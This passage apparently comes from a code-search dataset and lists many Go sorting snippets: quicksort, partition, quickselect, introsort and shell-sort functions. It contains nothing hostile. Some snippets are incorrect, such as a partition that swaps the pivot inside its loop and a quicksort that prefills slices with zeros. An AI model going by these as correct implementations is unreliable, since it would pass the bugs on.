PartitionInt(arr, low, high)\n\n\t\t// Separately sort elements before partition and after partition\n\t\tQuickSortInt(arr, low, pi-1)\n\t\tQuickSortInt(arr, pi+1, high)\n\t}\n}", "func QuickSort(arr []int, low, high int) []int {\n\tif low < high {\n\t\tpivot := partition(arr, low, high)\n\t\tQuickSort(arr, low, pivot - 1)\n\t\tQuickSort(arr, pivot + 1, high)\n\t}\n\n\treturn arr\n}", "func QuickSort(values []int) {\n\tqsort(values, 0, len(values)-1)\n}", "func radixQsort(kvs []_MapPair, d, maxDepth int) {\n for len(kvs) > 11 {\n // To avoid the worst case of quickSort (time: O(n^2)), use introsort here.\n // Reference: https://en.wikipedia.org/wiki/Introsort and\n // https://github.com/golang/go/issues/467\n if maxDepth == 0 {\n heapSort(kvs, 0, len(kvs))\n return\n }\n maxDepth--\n\n p := pivot(kvs, d)\n lt, i, gt := 0, 0, len(kvs)\n for i < gt {\n c := byteAt(kvs[i].k, d)\n if c < p {\n swap(kvs, lt, i)\n i++\n lt++\n } else if c > p {\n gt--\n swap(kvs, i, gt)\n } else {\n i++\n }\n }\n\n // kvs[0:lt] < v = kvs[lt:gt] < kvs[gt:len(kvs)]\n // Native implemention:\n // radixQsort(kvs[:lt], d, maxDepth)\n // if p > -1 {\n // radixQsort(kvs[lt:gt], d+1, maxDepth)\n // }\n // radixQsort(kvs[gt:], d, maxDepth)\n // Optimize as follows: make recursive calls only for the smaller parts.\n // Reference: https://www.geeksforgeeks.org/quicksort-tail-call-optimization-reducing-worst-case-space-log-n/\n if p == -1 {\n if lt > len(kvs) - gt {\n radixQsort(kvs[gt:], d, maxDepth)\n kvs = kvs[:lt]\n } else {\n radixQsort(kvs[:lt], d, maxDepth)\n kvs = kvs[gt:]\n }\n } else {\n ml := maxThree(lt, gt-lt, len(kvs)-gt)\n if ml == lt {\n radixQsort(kvs[lt:gt], d+1, maxDepth)\n radixQsort(kvs[gt:], d, maxDepth)\n kvs = kvs[:lt]\n } else if ml == gt-lt {\n radixQsort(kvs[:lt], d, maxDepth)\n radixQsort(kvs[gt:], d, maxDepth)\n kvs = kvs[lt:gt]\n d += 1\n } else {\n radixQsort(kvs[:lt], d, maxDepth)\n radixQsort(kvs[lt:gt], d+1, maxDepth)\n kvs = kvs[gt:] \n }\n }\n }\n insertRadixSort(kvs, d)\n}", "func quicksort(target []string) []string {\n\tif len(target) == 0 {\n\t\treturn []string{}\n\t}\n\tif len(target) == 1 {\n\t\treturn target\n\t}\n\tpivot := target[0]\n\tsmaller := []string{}\n\tlarger := []string{}\n\tfor i := 1; i < len(target); i++ {\n\t\tif target[i] < pivot {\n\t\t\tsmaller = append(smaller, target[i])\n\t\t} else {\n\t\t\tlarger = append(larger, target[i])\n\t\t}\n\t}\n\tsmaller = quicksort(smaller)\n\tlarger = quicksort(larger)\n\tsmaller = append(smaller, pivot)\n\tsmaller = append(smaller, larger...)\n\treturn smaller\n}", "func qabsSort(arr []scoreObject, start int, end int, originNode scoreObject) {\n\tvar (\n\t\tkey scoreObject = arr[start]\n\t\tlow int = start\n\t\thigh int = end\n\t)\n\n\trealNode := func(n scoreObject) float64 {\n\t\treturn math.Abs(n.scoreValue - originNode.scoreValue)\n\t}\n\n\tfor {\n\t\tfor low < high {\n\t\t\tif realNode(arr[high]) < realNode(key) {\n\t\t\t\tarr[low] = arr[high]\n\t\t\t\tbreak\n\t\t\t}\n\t\t\thigh--\n\t\t}\n\t\tfor low < high {\n\t\t\tif realNode(arr[low]) > realNode(key) {\n\t\t\t\tarr[high] = arr[low]\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tlow++\n\t\t}\n\t\tif low >= high {\n\t\t\tarr[low] = key\n\t\t\tbreak\n\t\t}\n\t}\n\tif low-1 > start {\n\t\tqabsSort(arr, start, low-1, originNode)\n\t}\n\tif high+1 < end {\n\t\tqabsSort(arr, high+1, end, originNode)\n\t}\n}", "func quickSelectAdaptive(data sort.Interface, k, a, b int) {\n\tvar (\n\t\tl int // |A| from the paper\n\t\tp int // pivot position\n\t)\n\tfor {\n\t\tl = b - a\n\t\tr := float64(k) / float64(l) // r <- real(k) / real(|A|)\n\t\tif l < 12 {\n\t\t\tp = hoarePartition(data, a+l/2, a, b) // HoarePartition(A, |A| / 2)\n\t\t} else if r < 7.0/16.0 {\n\t\t\tif r < 1.0/12.0 {\n\t\t\t\tp = repeatedStepFarLeft(data, k, a, b)\n\t\t\t} else {\n\t\t\t\tp = repeatedStepLeft(data, k, a, b)\n\t\t\t}\n\t\t} else if r >= 1.0-7.0/16.0 {\n\t\t\tif r >= 1.0-1.0/12.0 {\n\t\t\t\tp = repeatedStepFarRight(data, k, a, b)\n\t\t\t} else {\n\t\t\t\tp = repeatedStepRight(data, k, a, b)\n\t\t\t}\n\t\t} else {\n\t\t\tp = repeatedStepImproved(data, k, a, b)\n\t\t}\n\t\tif p == k {\n\t\t\treturn\n\t\t}\n\t\tif p > k {\n\t\t\tb = p // A <- A[0:p]\n\t\t} else {\n\t\t\t// i <- k - p - 1 // TODO what is i?\n\t\t\ta = p + 1 // A <- A[p+1:|A|]\n\t\t}\n\t}\n}", "func Qsort(a []map[string]interface{}) []map[string]interface{} {\n\tif len(a) < 2 {\n\t\treturn a\n\t}\n\n\tleft, right := 0, len(a)-1\n\n\t// Pick a pivot\n\tpivotIndex := rand.Int() % len(a)\n\n\t// Move the pivot to the right\n\ta[pivotIndex], a[right] = a[right], a[pivotIndex]\n\n\t// Pile elements smaller than the pivot on the left\n\tfor i := range a {\n\t\tif a[i][\"timestamp_sort\"].(float64) > a[right][\"timestamp_sort\"].(float64) {\n\t\t\ta[i], a[left] = a[left], a[i]\n\t\t\tleft++\n\t\t}\n\t}\n\n\t// Place the pivot after the last smaller element\n\ta[left], a[right] = a[right], a[left]\n\n\t// Go down the rabbit hole\n\tQsort(a[:left])\n\tQsort(a[left+1:])\n\n\treturn a\n}", "func Quicksort(arr []int) []int {\n\tif len(arr) < 2 {\n\t\treturn arr // arrays of size 0 or 1 are sorted\n\t} else {\n\t\trand.Seed(time.Now().UnixNano()) // seeding with the same value results in the same random sequence each run - this ensures this doesn't happen\n\t\trand_pivot_ind := rand.Intn(len(arr)) // random index to select the pivot\n\t\tpivot := arr[rand_pivot_ind] // choose a pivot, a random element would be better in the event of receiving an already sorted array\n\t\tless := make([]int, len(arr)/2) // potentially all elements end up in the left sub-array\n\t\tgreater := make([]int, len(arr)/2) // potentially all elements end up in the right sub-array\n\n\t\tfor i := range arr {\n\t\t\tif i == rand_pivot_ind {\n\t\t\t\t// skip the pivot\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif arr[i] > pivot {\n\t\t\t\tgreater = append(greater, arr[i]) // add all elements greater than the pivot to greater\n\t\t\t} else {\n\t\t\t\tless = append(less, arr[i]) // add all elements less than or equal to the pivot to less\n\t\t\t}\n\t\t}\n\t\t// join results such that:\n\t\t// less + pivot + greater\n\t\tres := append(Quicksort(less), pivot)\n\t\tres = append(res, Quicksort(greater)...)\n\t\treturn res\n\t}\n}", "func partition(data []int, left, right, pivotIndex int) int {\n\tpivotValue := data[pivotIndex]\n\n\t// move pivot to end\n\tdata[pivotIndex], data[right] = data[right], data[pivotIndex]\n\n\t// partition\n\tlowindex := left\n\tfor highIndex := left; highIndex < right; highIndex++ {\n\t\tif data[highIndex] < pivotValue {\n\t\t\tdata[highIndex], data[lowindex] = data[lowindex], data[highIndex]\n\t\t\tlowindex++\n\t\t}\n\t}\n\n\t// move pivot to its final place\n\tdata[lowindex], data[right] = data[right], data[lowindex]\n\n\treturn lowindex\n}", "func partitionHoare(list []int, left, right, pivotIndex int) int {\n\tpivot := list[pivotIndex]\n\n\tfor i, j := left-1, right+1; ; {\n\n\t\t// Find leftmost element greater than or equal to pivot\n\t\ti++\n\t\tfor list[i] < pivot {\n\t\t\ti++\n\t\t}\n\n\t\t// Find rightmost element less than or equal to pivot\n\t\tj--\n\t\tfor list[j] > pivot {\n\t\t\tj--\n\t\t}\n\n\t\t// If pointers meet\n\t\tif i >= j {\n\t\t\treturn j\n\t\t}\n\n\t\t// Swap the values at each pointer\n\t\tlist[i], list[j] = list[j], list[i]\n\t}\n}", "func QuickSort(ar []int, increasing bool) {\n\tquicksort(ar, 0, len(ar), increasing)\n\n}", "func partition(nums []int, start int, end int) int {\n\tfmt.Println(\"-00000-\")\n\tpivot := nums[start]\n\tfmt.Println(\"pivot\", pivot)\n\tleft := start + 1\n\tright := end\n\tfmt.Println(\"left\", left)\n\tfmt.Println(\"right\", right)\n\n\tfor left <= right {\n\t\tfor left <= right && nums[left] <= pivot {\n\t\t\tfmt.Println(\"nums[left]\", nums[left])\n\t\t\tfmt.Println(\"left before\", left)\n\t\t\tfmt.Println(\"NUMS\", nums)\n\t\t\tleft++\n\t\t\tfmt.Println(\"left\", left)\n\t\t\tfmt.Println(\"-LLLLLLL-\")\n\t\t}\n\t\tfor left <= right && nums[right] > pivot {\n\t\t\tfmt.Println(\"nums[right]\", nums[right])\n\t\t\tfmt.Println(\"right\", right)\n\t\t\tfmt.Println(\"NUMS\", nums)\n\t\t\tright--\n\t\t\tfmt.Println(\"right\", right)\n\t\t\tfmt.Println(\"-RRRRR-\")\n\t\t}\n\t\tfmt.Println(\"-FFFFF-\")\n\t\tfmt.Println(\"left\", left)\n\t\tfmt.Println(\"right\", right)\n\t\tfmt.Println(\"NUMS\", nums)\n\t\tif left <= right {\n\t\t\tfmt.Println(\"<<<<\", nums)\n\t\t\tnums[left], nums[right] = nums[right], nums[left]\n\t\t}\n\t\tfmt.Println(\"NUMS\", nums)\n\t}\n\tfmt.Println(\"SWITCHING\", nums)\n\tnums[right], nums[start] = nums[start], nums[right]\n\tfmt.Println(\"NUMS\", nums)\n\treturn right\n}", "func partition(arr []int, lo int, hi int) int {\n\ti := lo + 1\n\tj := hi\n\tpivot := arr[lo]\n\tfor {\n\t\tfor arr[i] < pivot {\n\t\t\tif i == hi {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\ti++\n\t\t}\n\t\tfor pivot < arr[j] {\n\t\t\tif j == lo {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tj--\n\t\t}\n\t\tif i >= j {\n\t\t\tbreak\n\t\t}\n\t\tarr[i], arr[j] = arr[j], arr[i]\n\t}\n\tarr[lo], arr[j] = arr[j], arr[lo]\n\treturn j\n}", "func QuickSortInt64(data []int64) {\n\tqsHandleInt64(data, 0, len(data)-1)\n}", "func QSort(arr []int) {\n\tsort(arr, 0, len(arr)-1)\n}", "func partition(a []int, low, high int) int {\n\ti := low - 1\n\tpivot := a[high]\n\tfor j := low; j < high; j++ {\n\t\tif a[j] <= pivot {\n\t\t\ti++\n\t\t\ta[i], a[j] = a[j], a[i]\n\t\t}\n\t\ta[i+1], a[high] = a[high], a[i+1]\n\t}\n\treturn i + 1\n}", "func partitionLomuto(list []int, left, right, pivotIndex int) int {\n\tpivot := list[pivotIndex]\n\n\t// Swap pivot to the end\n\tlist[pivotIndex], list[right] = list[right], list[pivotIndex]\n\n\tstoreIndex := left\n\tfor i := left; i <= right-1; i++ {\n\t\tif list[i] < pivot {\n\t\t\tlist[storeIndex], list[i] = list[i], list[storeIndex]\n\t\t\tstoreIndex++\n\t\t}\n\t}\n\n\t// Swap pivot into its final position\n\tlist[right], list[storeIndex] = list[storeIndex], list[right]\n\n\treturn storeIndex\n}", "func QuickSortInt(data []int) {\n\tqsHandleInt(data, 0, len(data)-1)\n}", "func (s *Introsort) introSort(data []int, maxdepth int) {\n\t// done\n\tif len(data) <= 1 {\n\t\treturn\n\t}\n\n\t// heapsort\n\tif maxdepth == 0 {\n\t\theapSort(data)\n\t\treturn\n\t}\n\n\t// quicksort\n\tp := partitionLumuto(data)\n\t//p := partitionHoare(data)\n\n\tif s.Concurrent && len(data) > ConcurrentCutoff {\n\t\ts.wg.Add(2)\n\t\tgo func() {\n\t\t\tdefer s.wg.Done()\n\t\t\ts.introSort(data[:p], maxdepth-1) // Lumuto\n\t\t\t//s.introSort(data[:p+1], maxdepth-1) // Hoare\n\t\t}()\n\t\tgo func() {\n\t\t\tdefer s.wg.Done()\n\t\t\ts.introSort(data[p+1:], maxdepth-1)\n\t\t}()\n\t} else {\n\t\ts.introSort(data[:p], maxdepth-1) // Lumuto\n\t\t//s.introSort(data[:p+1], maxdepth-1) // Hoare\n\t\ts.introSort(data[p+1:], maxdepth-1)\n\t}\n}", "func QuickSortInt32(data []int32) {\n\tqsHandleInt32(data, 0, len(data)-1)\n}", "func QuickSortDouble(arr *[]float64, low int, high int) {\n\tif low < high {\n\t\t/* pi is partitioning index, arr[p] is now at right place */\n\t\tpi := PartitionDouble(arr, low, high)\n\n\t\t// Separately sort elements before partition and after partition\n\t\tQuickSortDouble(arr, low, pi-1)\n\t\tQuickSortDouble(arr, pi+1, high)\n\t}\n}", "func doPivot(slice types.SliceType, pivotChooser PivotChooseFunc) (int, int) {\r\n\t// Invariants are:\r\n\t//\tdata[lo] = pivot (set up by ChoosePivot)\r\n\t//\tdata[lo < i < a] < pivot\r\n\t//\tdata[a <= i < b] <= pivot\r\n\t//\tdata[b <= i < c] unexamined\r\n\t//\tdata[c <= i < hi-1] > pivot\r\n\t//\tdata[hi-1] >= pivot\r\n\tm := pivotChooser(slice)\r\n\tpivot := 0\r\n\thi := len(slice)-1\r\n\ta, c := 1, hi-1\r\n\r\n\tfor ; a < c && slice.Less(a, pivot); a++ {\r\n\t}\r\n\tb := a\r\n\tfor {\r\n\t\tfor ; b < c && !slice.Less(pivot, b); b++ { // slice[b] <= pivot\r\n\t\t}\r\n\t\tfor ; b < c && slice.Less(pivot, c-1); c-- { // slice[c-1] > pivot\r\n\t\t}\r\n\t\tif b >= c {\r\n\t\t\tbreak\r\n\t\t}\r\n\t\t// slice[b] > pivot; slice[c-1] <= pivot\r\n\t\tslice.Swap(b, c-1)\r\n\t\tb++\r\n\t\tc--\r\n\t}\r\n\t// If hi-c<3 then there are duplicates (by property of median of nine).\r\n\t// Let be a bit more conservative, and set border to 5.\r\n\tprotect := hi-c < 5\r\n\tif !protect && hi-c < hi/4 {\r\n\t\t// Lets test some points for equality to pivot\r\n\t\tdups := 0\r\n\t\tif !slice.Less(pivot, hi-1) { // data[hi-1] = pivot\r\n\t\t\tslice.Swap(c, hi-1)\r\n\t\t\tc++\r\n\t\t\tdups++\r\n\t\t}\r\n\t\tif !slice.Less(b-1, pivot) { // data[b-1] = pivot\r\n\t\t\tb--\r\n\t\t\tdups++\r\n\t\t}\r\n\t\t// m-lo = (hi-lo)/2 > 6\r\n\t\t// b-lo > (hi-lo)*3/4-1 > 8\r\n\t\t// ==> m < b ==> data[m] <= pivot\r\n\t\tif !slice.Less(m, pivot) { // data[m] = pivot\r\n\t\t\tslice.Swap(m, b-1)\r\n\t\t\tb--\r\n\t\t\tdups++\r\n\t\t}\r\n\t\t// if at least 2 points are equal to pivot, assume skewed distribution\r\n\t\tprotect = dups > 1\r\n\t}\r\n\tif protect {\r\n\t\t// Protect against a lot of duplicates\r\n\t\t// Add invariant:\r\n\t\t//\tdata[a <= i < b] unexamined\r\n\t\t//\tdata[b <= i < c] = pivot\r\n\t\tfor {\r\n\t\t\tfor ; a < b && !slice.Less(b-1, pivot); b-- { // data[b] == pivot\r\n\t\t\t}\r\n\t\t\tfor ; a < b && slice.Less(a, pivot); a++ { // data[a] < pivot\r\n\t\t\t}\r\n\t\t\tif a >= b {\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t\t// data[a] == pivot; data[b-1] < pivot\r\n\t\t\tslice.Swap(a, b-1)\r\n\t\t\ta++\r\n\t\t\tb--\r\n\t\t}\r\n\t}\r\n\t// Swap pivot into middle\r\n\tslice.Swap(pivot, b-1)\r\n\treturn b - 1, c\r\n}", "func QuickSort(data interface{}, cmp func(i, j interface{}) bool) []interface{} {\n\tvalue := reflect.ValueOf(data)\n\tdataS := make([]interface{}, value.Len())\n\tfor a := 0; a < value.Len(); a++ {\n\t\tdataS[a] = value.Index(a).Interface()\n\t}\n\tqsHandle(dataS, 0, len(dataS)-1, cmp)\n\treturn dataS\n}", "func qs(array []float64, k int, first int, last int, r *rand.Rand) {\n\tif first == last-1 {\n\t\treturn\n\t}\n\n\tpivot := partitionItems(array, first, last, r)\n\tif k < pivot {\n\t\tqs(array, k, first, pivot, r)\n\t} else if k > pivot {\n\t\tqs(array, k, pivot+1, last, r)\n\t} else {\n\t\treturn\n\t}\n}", "func sort(arr []int, lo int, hi int) {\n\tif hi <= lo {\n\t\treturn\n\t}\n\tp := partition(arr, lo, hi)\n\tsort(arr, lo, p-1)\n\tsort(arr, p+1, hi)\n}", "func quickSelect(partition func(data sort.Interface, k, a, b int) int, data sort.Interface, k, a, b int) {\n\tfor {\n\t\tp := partition(data, k, a, b) // partition(A, k)\n\t\tif p == k {\n\t\t\treturn\n\t\t}\n\t\tif p > k {\n\t\t\tb = p\n\t\t} else {\n\t\t\t// k <- k - p - 1\n\t\t\ta = p + 1 // A <- A[p+1:|A|]\n\t\t}\n\t}\n}", "func QuickSort(collection []int) []int {\n\tif len(collection) <= 1 {\n\t\treturn collection\n\t}\n\tlo, hi := 0, len(collection)-1\n\n\treturn qsort(collection, lo, hi)\n}", "func quickSelectK(a []int, start, end, k int) {\n\tif start >= end || k-1 < start || k-1 > end {\n\t\treturn\n\t}\n\tpivot := a[(start+end)/2]\n\n\ti := start\n\tj := end\n\tfor {\n\t\tfor ; i <= end && a[i] < pivot; i++ {\n\t\t}\n\t\tfor ; j >= start && a[j] > pivot; j-- {\n\t\t}\n\t\tif i >= j {\n\t\t\tbreak\n\t\t}\n\t\ta[i], a[j] = a[j], a[i]\n\t\ti++\n\t\tj--\n\t}\n\n\tif k-1 < i {\n\t\tquickSelectK(a, start, i-1, k)\n\t} else if k-1 > j {\n\t\tquickSelectK(a, j+1, end, k)\n\t}\n}", "func QuickSortList(start, end *Node) {\n\tif start == end {\n\t\treturn\n\t}\n\tp, q := start, start.next\n\tfor q != end {\n\t\tif q.k < p.k {\n\t\t\t// swap the value, not change list structure\n\t\t\tswap(p, q)\n\t\t\tp = p.next\n\t\t\tswap(p, q)\n\t\t}\n\t\tq = q.next\n\t}\n\t// sort [start, p)\n\tQuickSortList(start, p)\n\t// sort (p, end)\n\tQuickSortList(p.next, end)\n}", "func QuickSortFloat64(data []float64) {\n\tqsHandleFloat64(data, 0, len(data)-1)\n}", "func ShellSort(slice []int) {\n\tfor i := len(slice) / 2; i > 0; i = (i + 1) * 5 / 11 {\n\t\tfor j := i; j < len(slice); j++ {\n\t\t\tk, temp := j, slice[j]\n\t\t\tfor ; k >= i && slice[k-i] > temp; k -= i {\n\t\t\t\tslice[k] = slice[k-i]\n\t\t\t}\n\t\t\tslice[k] = temp\n\t\t}\n\t}\n}", "func quickPartition(input []int) ([]int, int) {\n\tleft := 0\n\tright := len(input) - 1\n\n\treturn quickPartitionHelper(input, left, right)\n}", "func threeWayZfunc(data LessSwap, lo, hi int) (midlo, midhi int) {\n\tm := int(uint(lo+hi) >> 1)\n\tif hi-lo > 40 {\n\t\ts := (hi - lo) / 8\n\t\tmedianOfThreeZfunc(data, lo, lo+s, lo+2*s)\n\t\tmedianOfThreeZfunc(data, m, m-s, m+s)\n\t\tmedianOfThreeZfunc(data, hi-1, hi-1-s, hi-1-2*s)\n\t}\n\tmedianOfThreeZfunc(data, lo, m, hi-1)\n\tpivot := lo\n\ta, c := lo+1, hi-1\n\tfor ; a < c && data.Less(a, pivot); a++ {\n\t}\n\tb := a\n\tfor {\n\t\tfor ; b < c && !data.Less(pivot, b); b++ {\n\t\t}\n\t\tfor ; b < c && data.Less(pivot, c-1); c-- {\n\t\t}\n\t\tif b >= c {\n\t\t\tbreak\n\t\t}\n\t\tdata.Swap(b, c-1)\n\t\tb++\n\t\tc--\n\t}\n\tprotect := hi-c < 5\n\tif !protect && hi-c < (hi-lo)/4 {\n\t\tdups := 0\n\t\tif !data.Less(pivot, hi-1) {\n\t\t\tdata.Swap(c, hi-1)\n\t\t\tc++\n\t\t\tdups++\n\t\t}\n\t\tif !data.Less(b-1, pivot) {\n\t\t\tb--\n\t\t\tdups++\n\t\t}\n\t\tif !data.Less(m, pivot) {\n\t\t\tdata.Swap(m, b-1)\n\t\t\tb--\n\t\t\tdups++\n\t\t}\n\t\tprotect = dups > 1\n\t}\n\tif protect {\n\t\tfor {\n\t\t\tfor ; a < b && !data.Less(b-1, pivot); b-- {\n\t\t\t}\n\t\t\tfor ; a < b && data.Less(a, pivot); a++ {\n\t\t\t}\n\t\t\tif a >= b {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tdata.Swap(a, b-1)\n\t\t\ta++\n\t\t\tb--\n\t\t}\n\t}\n\tdata.Swap(pivot, b-1)\n\treturn b - 1, c\n}", "func partition1(objs sort.Interface, l, r int) int {\n\tif l > r {\n\t\treturn -1\n\t}\n\tif l == r {\n\t\treturn l\n\t}\n\tvar lessEqual, index = l, l\n\tfor index < r {\n\t\tif objs.Less(index, r) == true {\n\t\t\tobjs.Swap(index, lessEqual)\n\t\t\tlessEqual++\n\t\t}\n\t\tindex++\n\t}\n\tobjs.Swap(lessEqual, r)\n\treturn lessEqual\n}", "func partition(s []int, p_index int) int {\n\tpivot := s[p_index]\n\ts[p_index], s[len(s)-1] = s[len(s)-1], s[p_index]\n\tvar l, r int\n\tfor l, r = 0, len(s)-2; l <= r; {\n\t\tif s[l] <= pivot {\n\t\t\tl++\n\t\t} else {\n\t\t\ts[l], s[r] = s[r], s[l]\n\t\t\tr--\n\t\t}\n\t}\n\ts[len(s)-1], s[l] = s[l], s[len(s)-1]\n\treturn l\n}", "func ShellSort(arr []int) []int {\n\tfmt.Println(\"Shell Sort\")\n\tl := len(arr)\n\tfor gap:=l/2; gap > 0; gap = gap / 2 {\n\t\tfor i := gap ; i < l; i++ {\n\t\t\tvar j = i\n\t\t\tfor {\n\t\t\t\tif j - gap < 0 || arr[j] >= arr[j-gap] {\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tarr[j], arr[j-gap] = arr[j-gap], arr[j]\n\t\t\t\tj = j - gap\n\t\t\t}\n\t\t}\n\t}\n\treturn arr\n}", "func strictThreeWayZfunc(data LessSwap, lo, hi int) (midlo, midhi int) {\n\tm := int(uint(lo+hi) >> 1)\n\tif hi-lo > 40 {\n\t\ts := (hi - lo) / 8\n\t\tmedianOfThreeZfunc(data, lo, lo+s, lo+2*s)\n\t\tmedianOfThreeZfunc(data, m, m-s, m+s)\n\t\tmedianOfThreeZfunc(data, hi-1, hi-1-s, hi-1-2*s)\n\t}\n\tmedianOfThreeZfunc(data, lo, m, hi-1)\n\tpivot := lo\n\ta, c := lo+1, hi-1\n\tfor ; a < c && data.Less(a, pivot); a++ {\n\t}\n\tb := a\n\tfor {\n\t\tfor ; b < c && !data.Less(pivot, b); b++ {\n\t\t}\n\t\tfor ; b < c && data.Less(pivot, c-1); c-- {\n\t\t}\n\t\tif b >= c {\n\t\t\tbreak\n\t\t}\n\t\tdata.Swap(b, c-1)\n\t\tb++\n\t\tc--\n\t}\n\tfor {\n\t\tfor ; a < b && !data.Less(b-1, pivot); b-- {\n\t\t}\n\t\tfor ; a < b && data.Less(a, pivot); a++ {\n\t\t}\n\t\tif a >= b {\n\t\t\tbreak\n\t\t}\n\t\tdata.Swap(a, b-1)\n\t\ta++\n\t\tb--\n\t}\n\tif !data.Less(pivot, hi-1) {\n\t\tdata.Swap(c, hi-1)\n\t\tc++\n\t}\n\tdata.Swap(pivot, b-1)\n\treturn b - 1, c\n}", "func mediansort(l []interface{}, left int, right int, cmp func(x interface{}, y interface{}) (int, error)) {\n\tif left < right {\n\t\tmid := (right - left + 1) / 2\n\t\t_ = selectKth(l, mid+1, left, right, cmp)\n\t\tmediansort(l, left, left+mid-1, cmp)\n\t\tmediansort(l, left+mid+1, right, cmp)\n\t}\n}", "func qsort_2d(a_input [][]float64, idx int, ascend_or_desc string) [][]float64 {\r\n\r\n\t// copy a_input into a\r\n\ta := make([][]float64, len(a_input))\r\n\r\n\tfor i := range a {\r\n\t\ta[i] = make([]float64, len(a_input[i]))\r\n\t\tcopy(a[i], a_input[i])\r\n\t}\r\n\r\n\t// throw error message if ascend_or_desc is not set right\r\n\t// if ascend_or_desc = \"descending\", multiply every value in it\r\n\t// by -1 and then sort that ascending\r\n\tif ascend_or_desc == \"ascending\" {\r\n\t} else if ascend_or_desc == \"descending\" {\r\n\t\tfor i := 0; i < len(a[idx]); i++ {\r\n\t\t\ta[idx][i] *= -1\r\n\t\t}\r\n\t} else {\r\n\t\tfmt.Println(\"ERROR: ascend_or_desc in qsort_2d function must have value of 'ascending' or 'descending'\")\r\n\t}\r\n\r\n\tb := make([]int, len(a[idx]))\r\n\tfor i := 0; i < len(a[idx]); i++ {\r\n\t\tb[i] = i\r\n\t}\r\n\r\n\t// sort by the sorting row\r\n\t_, order := qsort_inner(a[idx], b)\r\n\r\n\t//sort all other rows\r\n\tfor i := 0; i < len(a); i++ {\r\n\t\tif i != idx {\r\n\t\t\ttemp := make([]float64, len(a[i]))\r\n\t\t\tcopy(temp, a[i])\r\n\t\t\tfor j := 0; j < len(order); j++ {\r\n\t\t\t\ta[i][j] = temp[order[j]]\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\t// revert a[idx] row back to original values\r\n\tif ascend_or_desc == \"descending\" {\r\n\t\tfor i := 0; i < len(a[idx]); i++ {\r\n\t\t\ta[idx][i] *= -1\r\n\t\t}\r\n\t}\r\n\treturn a\r\n}", "func minsort(array []int) {\n\tbuildMinHeapify(array)\n\n\tfor i := len(array) - 1; i >= 1; i-- {\n\t\tarray[0], array[i] = array[i], array[0]\n\t\tminHeapify(array[:i], 0)\n\t}\n}", "func shearSort(proc meshinfo) {\n defer proc.signal.Done()\n\tvalue := <-proc.input\n\n t := 0\n for phase := proc.rows; phase > 1; phase /= 2 {\n snake(&value,t,proc)\n up(&value,t+1,proc)\n t += 2\n }\n snake(&value,t,proc)\n\n}", "func qsortMulti(a []map[string]float64) []map[string]float64 {\n\tif len(a) < 2 {\n\t\treturn a\n\t}\n\n\tleft, right := 0, len(a)-1\n\n\t// Pick a pivot\n\tpivotIndex := rand.Int() % len(a)\n\n\t// Move the pivot to the right\n\ta[pivotIndex], a[right] = a[right], a[pivotIndex]\n\n\t// Pile elements smaller than the pivot on the left\n\tfor i := range a {\n\t\tif a[i][\"date\"] > a[right][\"date\"] {\n\t\t\ta[i], a[left] = a[left], a[i]\n\t\t\tleft++\n\t\t}\n\t}\n\n\t// Place the pivot after the last smaller element\n\ta[left], a[right] = a[right], a[left]\n\n\t// Go down the rabbit hole\n\tqsortMulti(a[:left])\n\tqsortMulti(a[left+1:])\n\n\treturn a\n}", "func pivotIndex(nums []int) int {\n\tif len(nums) == 0 {\n\t\treturn -1\n\t}\n\tvar sum1, sum2, i, j int\n\ti = 1\n\tj = len(nums) - 2\n\n\tsum1 = nums[0]\n\tsum2 = nums[len(nums)-1]\n\n\tfor i < j {\n\t\tif sum1+nums[i]-sum2 <= sum1-(sum2+nums[j]) {\n\t\t\tsum1 += nums[i]\n\t\t\ti++\n\t\t} else {\n\t\t\tsum2 += nums[j]\n\t\t\tj--\n\t\t}\n\t}\n\tfmt.Println(sum1, sum2)\n\tif sum1 == sum2 {\n\t\treturn i\n\t}\n\treturn -1\n}", "func QuicksortByName(cs []Customer , left int, right int) {\n\tif left < right {\n\t\tpivot := partitionByName(cs, left, right)\n\t\tQuicksortByName(cs, left, pivot - 1)\n\t\tQuicksortByName(cs, pivot + 1, right)\n\t}\n}", "func QuickSortFloat32(data []float32) {\n\tqsHandleFloat32(data, 0, len(data)-1)\n}", "func Quick(slice []int) []int {\n\tsliceCopy := make([]int, len(slice))\n\tcopy(sliceCopy, slice)\n\n\tsort(sliceCopy, 0, len(sliceCopy)-1)\n\n\treturn sliceCopy\n}", "func partition(data []float64) (lows []float64, pivotValue float64, highs []float64) {\n\tlength := len(data)\n\t// there are better (more complex) ways to calculate pivotIndex (e.g. median of 3, median of 3 medians) if this\n\t// proves to be inadequate.\n\tpivotIndex := rand.Int() % length\n\tpivotValue = data[pivotIndex]\n\tlow, high := 1, length-1\n\n\t// put the pivot in the first position\n\tdata[pivotIndex], data[0] = data[0], data[pivotIndex]\n\n\t// partition the data around the pivot\n\tfor low <= high {\n\t\tfor low <= high && data[low] <= pivotValue {\n\t\t\tlow++\n\t\t}\n\t\tfor high >= low && data[high] >= pivotValue {\n\t\t\thigh--\n\t\t}\n\t\tif low < high {\n\t\t\tdata[low], data[high] = data[high], data[low]\n\t\t}\n\t}\n\n\treturn data[1:low], pivotValue, data[high+1:]\n}", "func BenchmarkQuickSortSortedInt(b *testing.B) {\n\tconst dataSize int = 5000\n\n\tdata := []int{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 